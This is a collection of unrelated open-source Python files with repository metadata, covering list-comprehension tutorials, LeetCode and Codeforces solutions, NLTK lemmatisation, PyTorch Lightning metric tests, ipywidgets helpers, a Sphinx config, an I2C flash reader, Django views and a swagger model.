refs/heads/master
| 2023-01-09T07:51:15.494101
| 2020-10-11T23:39:08
| 2020-10-11T23:39:08
| 283,790,276
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,343
|
py
|
"""
List Comprehension ->> utilizando List Comprehension nós podemos gerar novas listas com dados processados
a partir de outro iterável (uma coleção de dados)
- Sintaxe da List Comprehension
- [dado clausula for dado in itervael]
<$> Para melhor entender o que está acontecendo devemos dividir a expressão em duas partes:
- A primeira parte: for dado in iteravel
- A segunda parte: dado <-> aplica-se a operação expressa em clausula
"""
# Exemplos
numeros = [1, 2, 3, 4, 5] # Nosso iterável exemplo
print(f'Neste primeiro exemplo nossa lista-> {numeros}\nSeu tipo é -> {type(numeros)}')
# Observe o poder da list comprehension
res = [numero * 10 for numero in numeros]
print(f'Neste primeiro exemplo vamos multiplicar cada elemento da lista por 10 -> {res}\nSeu tipo é -> {type(res)}')
# Exemplos observe o poder do comprehension
res = [numero / 2 for numero in numeros]
print(f'Neste primeiro exemplo vamos dividir cada elemento da lista por 2 -> {res}\nSeu tipo é -> {type(res)}')
def funcao(valor):
"""
Função para teste do poder do comprehension
:param valor: Parâmetro a ser passado para a funcao ->> receberá os valores vindo do iterável
:return: Retorna o valor multiplicado por ele próprio
"""
return valor * valor
res = [funcao(numero) for numero in numeros]
print(f'Neste exemplo vamos trabalhar com a função teste -> {res}\nSeu tipo é -> {type(res)}')
# Avaliando diferenças =>> list Comprehension x loop
# Loop
numeros = [1, 2, 3, 4, 5]
numeros_dobrados = []
for numero in numeros:
numero_dobrado = numero * 2
numeros_dobrados.append(numero_dobrado)
print(f'Comparando List Comprehension x loop -> loop {numeros_dobrados}\nSeu tipo é {type(numeros_dobrados)}')
# Vamos refatorar o código acima para que seja menos traumático quando comparado com o uso do Comprehension
numeros_dobrados = []
for numero in [1, 2, 3, 4, 5]:
numeros_dobrados.append(numero * 2)
print(f'Comparando após refatorado List Comprehension x loop -> loop {numeros_dobrados}\nSeu tipo é {type(numeros_dobrados)}')
# O mesmo exemplo utilizndo list Comprehension ->> observe as duas formas veja a facilidade!!!
res = [numero * 2 for numero in numeros]
print(f'O mesmo exemplo com list Comprehension {res}')
print(f'O mesmo exemplo com list Comprehension {[numero * 2 for numero in numeros]}')
# Outros exemplos
# Exemplo 1 -> queremos colocar todos os caracteres em maiúscula
nome = 'Python para Ciência de Dados'
print(f'Exemplos de uso de list comprehension -> {[letra.upper() for letra in nome]}\nSeu tipo é -> {type([letra.upper() for letra in nome])}')
# Exemplo 2 -> queremos colocar apenas o primeiro caracter em maiúscula
amigos = ['joão', 'pedro', 'fernando', 'mariana', 'carlos']
print(f'Primeiro em maiúcula -> {[amigo.title() for amigo in amigos]}')
# Exemplo 3 -> trabablhando com range -> queremos multiplicar por 10 uma lista gerada por range
print(f'Trabalhando com range -> {[numero * 10 for numero in range(1, 10)]}')
# Exemplo 4 -> convertendo uma lista para boolean
print(f'Converte para Boolean -> {[bool(valor) for valor in [0, [],"", True, 1, 2, 3, 100.37]]}')
# Exemplo 5 -> transformando números em string usando cast
print(f'Tranformando números em strings -> {[str(letra) for letra in [1, 2, 3, 4, 5]]}')
|
[
"accolombini@gmail.com"
] |
accolombini@gmail.com
|
7af3564ec490ee7c916717f5e43254d06bac12c9
|
3c73609eea12d6784ffc0be5acc6994cda19dc57
|
/Codeforces Difficulty 500-700/595AVitalyAndNight.py
|
c02b2a9caee1ba24e4511fe2d5b3542c6977975d
|
[] |
no_license
|
TanveshT/Competitive-Programming
|
0cf7a8ebc20a74cb6fd8505e67fbfec5bac6b8c2
|
47acc0a2af2711c86bb0da06e961677a8ec1e7d3
|
refs/heads/master
| 2022-12-19T01:44:46.033633
| 2020-09-25T06:57:23
| 2020-09-25T06:57:23
| 258,095,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 225
|
py
|
n, m = map(int, input().split())
m2 = 2*m
count = 0
for i in range(n):
floor = list(map(int, input().split()))
for j in range(0,m2,2):
if floor[j] == 1 or floor[j+1] == 1:
count += 1
print(count)
|
[
"tanveshtakawale26@gmail.com"
] |
tanveshtakawale26@gmail.com
|
cf11d468c235daf41b6fa67bdd4fd202349ff255
|
579ddcffa5519d0cfde6209d3c030e12b487b05f
|
/LeetCode_June2020/is_subsequence.py
|
28c96b53d3390b07c328f9bf06bdb376456dfb6f
|
[] |
no_license
|
mrshaikh4u/Problem-solving
|
001e00292e531c4205b80785f617c6189ec9f2a8
|
96b257e2053eaaa75a152e92657cbf39f9169b8a
|
refs/heads/master
| 2022-11-13T19:48:43.565431
| 2022-11-03T18:42:49
| 2022-11-03T18:42:49
| 252,262,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 607
|
py
|
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if t is None or len(t)==0:
return s is None or len(s)==0
if s is None or len(s)==0:
return True
# s = "abc", t = "ahbgdc"
ptr = 0
for c in s:
found = False
while ptr < len(t):
if t[ptr] == c:
found = True
ptr+=1
break
ptr+=1
if found == False:
return False
return True
obj = Solution()
print(obj.isSubsequence("","abcd"))
|
[
"mohamedrshaikh@gmail.com"
] |
mohamedrshaikh@gmail.com
|
781fed99b49ba8f6c143ba1f942e9603e3a68d20
|
e32a75c44ef9c964bc5f97712c8e0e845ee3f6ca
|
/lemmatise_question_vocab.py
|
74408714d90e2917500ed5edbe53dc9a64b74ca6
|
[] |
no_license
|
ankita-kalra/ivqa_belief_set
|
29c40ec4076433ac412728aea603e4e69ce530eb
|
6ebba50ff001e1af6695bb3f4d2643e7072ee153
|
refs/heads/master
| 2020-04-05T17:17:00.834303
| 2018-08-27T09:59:16
| 2018-08-27T09:59:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
with open('data/vqa_trainval_question_word_counts.txt', 'r') as fs:
lines = fs.readlines()
words = [line.split()[0].strip() for line in lines]
with open('tmp_dump.txt', 'w') as fs:
for word in words:
fs.write('%s\n' % word)
from nltk.corpus import wordnet as wn
import nltk
import numpy as np
def is_noun(tag):
return tag in ['NN', 'NNS', 'NNP', 'NNPS']
def is_verb(tag):
return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']
def is_adverb(tag):
return tag in ['RB', 'RBR', 'RBS']
def is_adjective(tag):
return tag in ['JJ', 'JJR', 'JJS']
def penn_to_wn(tag):
if is_adjective(tag):
return wn.ADJ
elif is_noun(tag):
return wn.NOUN
elif is_adverb(tag):
return wn.ADV
elif is_verb(tag):
return wn.VERB
return None
# generated lemmatized words
lemmatized = []
for i, word in enumerate(words):
pos_tag = nltk.pos_tag([word])
tag = pos_tag[0][-1]
wn_type = penn_to_wn(tag)
if wn_type is None:
lem_word = word
else:
lem_word = nltk.stem.WordNetLemmatizer().lemmatize(word, wn_type)
lemmatized.append(lem_word)
# build mapping
vocab = {word: i for i, word in enumerate(words)}
index = []
for lem_word, word in zip(lemmatized, words):
try:
id = vocab[lem_word]
except:
id = vocab[word]
index.append(id)
index = np.array(index, dtype=np.int32)
from scipy.io import savemat
savemat('data/quest_token2lemma.mat', {'word2lemma': index})
|
[
"liufeng@seu.edu.cn"
] |
liufeng@seu.edu.cn
|
fad4277ce6037da4dbeb48ec277ee28b3e0372c9
|
9e1df555176bae216828c404ad7290c2eb030cbf
|
/tests/metrics/test_metric.py
|
d97cd1a176cf294208e20b3b3e4a764318141b3c
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
shijianjian/pytorch-lightning
|
e11be4d4926a1a0c8f605e596bec19926d476876
|
b6f3cf5e52dddedec6f7b3e85c0702b75907452c
|
refs/heads/master
| 2023-03-02T14:58:54.139540
| 2021-02-10T05:38:23
| 2021-02-10T05:38:23
| 318,134,795
| 1
| 0
|
Apache-2.0
| 2020-12-03T09:05:46
| 2020-12-03T09:05:45
| null |
UTF-8
|
Python
| false
| false
| 3,841
|
py
|
import pickle
from collections import OrderedDict
from distutils.version import LooseVersion
import cloudpickle
import numpy as np
import pytest
import torch
from pytorch_lightning.metrics.metric import Metric
torch.manual_seed(42)
class Dummy(Metric):
name = "Dummy"
def __init__(self):
super().__init__()
self.add_state("x", torch.tensor(0), dist_reduce_fx=None)
def update(self):
pass
def compute(self):
pass
def test_inherit():
a = Dummy()
def test_add_state():
a = Dummy()
a.add_state("a", torch.tensor(0), "sum")
assert a._reductions["a"](torch.tensor([1, 1])) == 2
a.add_state("b", torch.tensor(0), "mean")
assert np.allclose(a._reductions["b"](torch.tensor([1.0, 2.0])).numpy(), 1.5)
a.add_state("c", torch.tensor(0), "cat")
assert a._reductions["c"]([torch.tensor([1]), torch.tensor([1])]).shape == (2,)
with pytest.raises(ValueError):
a.add_state("d1", torch.tensor(0), 'xyz')
with pytest.raises(ValueError):
a.add_state("d2", torch.tensor(0), 42)
with pytest.raises(ValueError):
a.add_state("d3", [torch.tensor(0)], 'sum')
with pytest.raises(ValueError):
a.add_state("d4", 42, 'sum')
def custom_fx(x):
return -1
a.add_state("e", torch.tensor(0), custom_fx)
assert a._reductions["e"](torch.tensor([1, 1])) == -1
def test_add_state_persistent():
a = Dummy()
a.add_state("a", torch.tensor(0), "sum", persistent=True)
assert "a" in a.state_dict()
a.add_state("b", torch.tensor(0), "sum", persistent=False)
if LooseVersion(torch.__version__) >= LooseVersion("1.6.0"):
assert "b" not in a.state_dict()
def test_reset():
class A(Dummy):
pass
a = A()
assert a.x == 0
a.x = torch.tensor(5)
a.reset()
assert a.x == 0
def test_update():
class A(Dummy):
def update(self, x):
self.x += x
a = A()
assert a.x == 0
assert a._computed is None
a.update(1)
assert a._computed is None
assert a.x == 1
a.update(2)
assert a.x == 3
assert a._computed is None
def test_compute():
class A(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
a = A()
assert 0 == a.compute()
assert 0 == a.x
a.update(1)
assert a._computed is None
assert a.compute() == 1
assert a._computed == 1
a.update(2)
assert a._computed is None
assert a.compute() == 2
assert a._computed == 2
# called without update, should return cached value
a._computed = 5
assert a.compute() == 5
def test_forward():
class A(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
a = A()
assert a(5) == 5
assert a._forward_cache == 5
assert a(8) == 8
assert a._forward_cache == 8
assert a.compute() == 13
class ToPickle(Dummy):
def update(self, x):
self.x += x
def compute(self):
return self.x
def test_pickle(tmpdir):
# doesn't tests for DDP
a = ToPickle()
a.update(1)
metric_pickled = pickle.dumps(a)
metric_loaded = pickle.loads(metric_pickled)
assert metric_loaded.compute() == 1
metric_loaded.update(5)
assert metric_loaded.compute() == 5
metric_pickled = cloudpickle.dumps(a)
metric_loaded = cloudpickle.loads(metric_pickled)
assert metric_loaded.compute() == 1
def test_state_dict(tmpdir):
""" test that metric states can be removed and added to state dict """
metric = Dummy()
assert metric.state_dict() == OrderedDict()
metric.persistent(True)
assert metric.state_dict() == OrderedDict(x=0)
metric.persistent(False)
assert metric.state_dict() == OrderedDict()
|
[
"noreply@github.com"
] |
shijianjian.noreply@github.com
|
4e8c3e29671d3b8ee93186ca9cb39e1dc9041ad6
|
0fbc2dff6c74d79fcdc3170c8bfb2fe8fa955175
|
/notebooks/widget_org.py
|
624b1b94ee375d5ac5c91a1f23818bb2cee26729
|
[
"BSD-3-Clause"
] |
permissive
|
mwcraig/tutorial
|
abedcaa251d63d7de4a0c17f99a7f7dd7639d086
|
e1dfa624b0d043f33b768edeb35629741f4d890f
|
refs/heads/master
| 2022-11-08T15:09:04.056005
| 2019-07-07T22:06:12
| 2019-07-07T23:04:16
| 134,425,268
| 0
| 0
|
BSD-3-Clause
| 2018-05-22T14:11:30
| 2018-05-22T14:11:30
| null |
UTF-8
|
Python
| false
| false
| 7,088
|
py
|
import string
import inspect
from collections import defaultdict
import ipywidgets as widgets
def extract_module_name(obj, full=False):
"""
Get the name of a module for an object.
"""
properties = inspect.getmembers(obj)
for name, value in properties:
if name == '__module__':
if full:
return value.split('.')[-1]
else:
return value
else:
raise ValueError('How odd...no moduel was found!')
def organized_widgets(organize_by='ui'):
"""
Return a dictionary of all DOM widgets organized by either which module
they are in or by the type of UI.
Parameters
----------
organize_by : str, optional
Must be one of 'ui' or 'module'. Determines the keys in the returned
dictionary.
Returns
-------
dict
Dictionary whose keys are the names of the widget groups and whose
values are dictionaries. The dictionaries which are the values of
``groups`` have the name of the widget to be displayed as
the key and the class of the widget as the value.
"""
valid_organizations = ['ui', 'module']
if organize_by not in valid_organizations:
raise ValueError(f'Invalid value {organize_by} for organize_by. '
'Valid options are: {valid_organizations}')
all_wids = inspect.getmembers(widgets)
# for a in all_wids:
# name = a[0]
# arf = a[1]
# if (not name.startswith('_') and
# name[0] in string.ascii_uppercase and
# issubclass(arf, widgets.DOMWidget)):
# print('woot')
widget_dict = {name: wid for name, wid in all_wids
if not name.startswith('_') and
name[0] in string.ascii_uppercase and
issubclass(wid, widgets.DOMWidget) and
name != 'DOMWidget'
}
if organize_by == 'ui':
containers = ['Box', 'VBox', 'HBox', 'GridBox',
'Accordion', 'Tab', 'AppLayout', 'GridspecLayout',
'TwoByTwoLayout']
groups = dict(
sliders={k: v for k, v in widget_dict.items() if 'Slider' in k},
buttons={k: v for k, v in widget_dict.items() if 'Button' in k},
containers={k: v for k, v in widget_dict.items() if k in containers},
texts={k: v for k, v in widget_dict.items() if 'text' in k or 'Text' in k or 'HTML' in k or k in ['Label', 'Password']},
progress={k: v for k, v in widget_dict.items() if 'Progress' in k},
selects={k: v for k, v in widget_dict.items() if k in ['Dropdown', 'Select', 'SelectMultiple']},
media={k: v for k, v in widget_dict.items() if k in ['Audio', 'Image', 'Play', 'Video']}
)
all_so_far = [name for k, v in groups.items() for name in v.keys()]
groups['others'] = {k: v for k, v in widget_dict.items() if k not in all_so_far}
elif organize_by == 'module':
groups = defaultdict(dict)
for k, v in widget_dict.items():
module_name = extract_module_name(v)
# Grab just the very last part of the module name for a nicer title
module_name = module_name.split('_')[-1]
groups[module_name][k] = v
return groups
def list_overview_widget(groups,
help_url_base='',
columns=3,
min_width_single_widget=300):
"""
Create an tab-based display of all of the widgets in ``groups``, with
a separate tab for each key in groups and links to more detail for each
widget. The first line of the docstring of each widget provides a
short description of the widget.
Parameters
----------
groups : dict
Dictionary whose keys are the names of the widget groups and whose
values are dictionaries. The dictionaries which are the values of
``groups`` should have the name of the widget to be displayed as
the key and the class of the widget as the value.
help_url_base : str, optional
URL to prepend to the help link for each widget.
columns : int, optional
Number of columns to use in displaying the widgets.
min_width_single_widget : int, optional
Minimum width, in pixels, of a widget displayed on a tab.
Returns
-------
widgets.Tab
A ``Tab`` widget with one tab for key of groups in which all of
the widgets in that group are displayed.
"""
tabs = widgets.Tab()
if help_url_base is None:
help_url_base = 'https://ipywidgets.readthedocs.io/en/stable/examples/Widget%20List.html'
titles = []
kids = []
def box_maker(name, widget, group):
layout = widgets.Layout(grid_template_columns="1fr",
border='2px solid gray')
b = widgets.GridBox(layout=layout)
module = extract_module_name(widget, full=True)
#print(' ', widget.__name__, module)
if 'selection' in module:
extra_args = dict(options=[1, 2, 3])
elif 'progress' in widget.__name__.lower():
extra_args = dict(value=50)
elif 'gridspeclayout' in widget.__name__.lower():
extra_args = dict(n_rows=3, n_columns=3)
else:
extra_args = {}
wid = widget(description='A label!', **extra_args)
try:
short_description = wid.__doc__.split('\n')[0]
if not short_description:
short_description = wid.__doc__.split('\n')[1]
except AttributeError:
short_description = ''
url = f'{help_url_base}#{name}'
if help_url_base == '':
help_link = f'<h3><a href="{url}" rel="nofollow" target="_self" style="color:gray;">{name}</a></h3><p>{short_description}</p>'
else:
magic_stuff = 'data-commandlinker-command="rendermime:handle-local-link" data-commandlinker-args="{"path":"04.00-widget-list.ipynb","id":"#IntRangeSlider"}"'
help_link = f'<h3><a href="{url}" rel="nofollow" target="_blank" style="color:gray;" {magic_stuff}>{name}</a></h3><p>{short_description}</p>'
title = widgets.HTML(value=help_link)
title.layout.padding = '10px'
b.layout.overflow_x = 'hidden'
b.children = [title, wid]
return b
for group, group_widgets in groups.items():
# print(group)
titles.append(group)
col_spec = f"repeat({columns}, minmax({min_width_single_widget}px, 1fr)"
layout = widgets.Layout(grid_template_columns=col_spec,
grid_gap='10px 10px')
kid = widgets.GridBox(layout=layout)
kid.children = [box_maker(k, v, group) for k, v in group_widgets.items()]
kids.append(kid)
tabs.children = kids
for i, title in enumerate(titles):
nice = title.replace('_', ' ')
tabs.set_title(i, nice.title())
return tabs
|
[
"mattwcraig@gmail.com"
] |
mattwcraig@gmail.com
|
3daeb98cf549c02dfd2bbba036a474e93b402841
|
5a281cb78335e06c631181720546f6876005d4e5
|
/sahara-10.0.0/api-ref/source/conf.py
|
d7580249d82601bc268b6c35106c8df3c1ec2580
|
[
"Apache-2.0"
] |
permissive
|
scottwedge/OpenStack-Stein
|
d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8
|
7077d1f602031dace92916f14e36b124f474de15
|
refs/heads/master
| 2021-03-22T16:07:19.561504
| 2020-03-15T01:31:10
| 2020-03-15T01:31:10
| 247,380,811
| 0
| 0
|
Apache-2.0
| 2020-03-15T01:24:15
| 2020-03-15T01:24:15
| null |
UTF-8
|
Python
| false
| false
| 7,091
|
py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# sahara documentation build configuration file, created Fri May 6 15:19:20
# 2016.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
extensions = [
'os_api_ref',
'openstackdocstheme'
]
# openstackdocstheme options
repository_name = 'openstack/sahara'
bug_project = '935'
bug_tag = 'api-ref'
html_last_updated_fmt = '%Y-%m-%d %H:%M'
html_theme = 'openstackdocs'
html_theme_options = {
"sidebar_dropdown": "api_ref",
"sidebar_mode": "toc",
}
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Data Processing API Reference'
copyright = u'2010-present, OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from sahara.version import version_info
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# The reST default role (used for this markup: `text`) to use
# for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'saharaoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'Sahara.tex', u'OpenStack Data Processing API Documentation',
u'OpenStack Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
|
[
"Wayne Gong@minbgong-winvm.cisco.com"
] |
Wayne Gong@minbgong-winvm.cisco.com
|
210609fb82f3bd44f14c0dc789314dd099ea2a0f
|
08c132bc63ebba2edebde139f7907953ae2fa04d
|
/Archived_Files/FTDI_Python_Libraries - SPI_MDIO_I2C/etc_i2c_flash.py
|
5dc8f62ab699ff7816ef920fa89870c54f41af85
|
[] |
no_license
|
hudkmr/Code_Database
|
12b60d1b331b91e9dc990d63bd4603bb92d0bfe7
|
d80751c13bd30114af70d690ef8fc1a0d6368490
|
refs/heads/master
| 2021-01-21T12:49:47.564408
| 2015-07-30T02:28:07
| 2015-07-30T02:28:07
| 39,899,454
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
#This Script Reads the Data from I2C Slave device(Flash memory) using FTDI MPSSE Engine
from etc_abb_i2c_lib import BB_I2C
from etc_abb_i2c_lib.etc_header import *
import sys
import time
d=BB_I2C(0)
d.DevConf(BAUD,DO_MASK_VAL,SYNC_MODE)
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,0)
TXACKBuf+=d.SendByte('00')
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,1)
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
data = ['1','2','3','4','5','6','7','8']
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,0)
TXACKBuf+=d.SendByte(0x10)
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,1)
for i in range(7):
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
|
[
"hudkmr@gmail.com"
] |
hudkmr@gmail.com
|
117aa18bc9ed57ce6572e9120224d114fc632a6e
|
32e2e9ecd12d4eeaacc64d1a699672633501ea08
|
/find_a_midwife/views.py
|
142206c710eac207c0818e7371cb179f8e186912
|
[] |
no_license
|
BrianC68/wr_maternity
|
365098abb13d255348d2d57bf1c543cd698e6ae8
|
5392fdead32c5f79c7be9a4cb0397df26a5de915
|
refs/heads/master
| 2023-01-24T08:42:06.965179
| 2023-01-20T17:42:44
| 2023-01-20T17:42:44
| 233,097,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import ListView, DetailView
from .models import Midwife
class MidwifeListView(ListView):
'''Page that displays all midwives.'''
template_name = 'midwife_list_view.html'
model = Midwife
context_object_name = 'midwives'
def get_queryset(self):
queryset = super().get_queryset().only('name', 'service_area', 'photo')
return queryset
class MidwifeDetailView(DetailView):
'''Page that displays individual doula details.'''
template_name = 'midwife_detail_view.html'
model = Midwife
context_object_name = 'midwife'
|
[
"brianc@wi.rr.com"
] |
brianc@wi.rr.com
|
a8be8bddddc67ab30f266259012c32c14fe1bede
|
ce18cf6bdb1a85a65a509597b4c0ec046b855186
|
/2021年4月/接雨水.py
|
e3b2d4f6b80d4cf594dc6bc3a4110f902cfdb9c8
|
[] |
no_license
|
elssm/leetcode
|
e12e39faff1da5afb234be08e7d9db85fbee58f8
|
a38103d2d93b34bc8bcf09f87c7ea698f99c4e36
|
refs/heads/master
| 2021-06-11T06:44:44.993905
| 2021-04-28T06:14:23
| 2021-04-28T06:14:23
| 171,072,054
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,415
|
py
|
class Solution(object):
def trap(self, height):
"""
:type height: List[int]
:rtype: int
"""
if len(height) <= 1:
return 0
#两层循环时间复杂度太大了。不过思路没问题
# ans=0
# start=0
# end=0
# max_h = max(height)
# for i in range(1,max_h+1):
# for j in range(len(height)):
# if height[j]>=i:
# start=j
# break
# for k in range(len(height)):
# if height[len(height)-k-1]>=i:
# end=len(height)-k-1
# break
# for j in range(start+1,end):
# if height[j]<i:
# ans+=1
# return ans
#找到最大值
max_h = max(height)
#找到最大值的下标(第一个最大值)
index = height.index(max_h)
ans=0
temp=0
#从左到最大值遍历
for i in range(index):
if height[i]<height[temp]:
ans=ans+(height[temp]-height[i])
else:
temp=i
height=list(reversed(height[index:]))
temp2=0
for i in range(len(height)):
if height[i]<height[temp2]:
ans=ans+(height[temp2]-height[i])
else:
temp2=i
return ans
|
[
"noreply@github.com"
] |
elssm.noreply@github.com
|
69debec428098617652296bd578146c4657179a1
|
caf6ae544fce3b332b40a03462c0646a32c913e1
|
/master/python/swagger_client/models/deposit_id.py
|
9d6a813e681197d9448474fe5c7f2b9e39942158
|
[
"Apache-2.0"
] |
permissive
|
coinsecure/plugins
|
827eb0ce03a6a23b4819a618ee47600161bec1c7
|
ad6f08881020c268b530d5242d9deed8d2ec84de
|
refs/heads/master
| 2020-05-30T07:17:56.255709
| 2016-11-27T22:22:23
| 2016-11-27T22:22:23
| 63,496,663
| 3
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,799
|
py
|
# coding: utf-8
"""
Coinsecure Api Documentation
To generate an API key, please visit <a href='https://coinsecure.in/api' target='_new' class='homeapi'>https://coinsecure.in/api</a>.<br>Guidelines for use can be accessed at <a href='https://api.coinsecure.in/v1/guidelines'>https://api.coinsecure.in/v1/guidelines</a>.<br>Programming Language Libraries for use can be accessed at <a href='https://api.coinsecure.in/v1/code-libraries'>https://api.coinsecure.in/v1/code-libraries</a>.
OpenAPI spec version: 1.0b
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class DepositID(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
DepositID - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'deposit_id': 'str'
}
self.attribute_map = {
'deposit_id': 'depositID'
}
self._deposit_id = None
@property
def deposit_id(self):
"""
Gets the deposit_id of this DepositID.
:return: The deposit_id of this DepositID.
:rtype: str
"""
return self._deposit_id
@deposit_id.setter
def deposit_id(self, deposit_id):
"""
Sets the deposit_id of this DepositID.
:param deposit_id: The deposit_id of this DepositID.
:type: str
"""
self._deposit_id = deposit_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
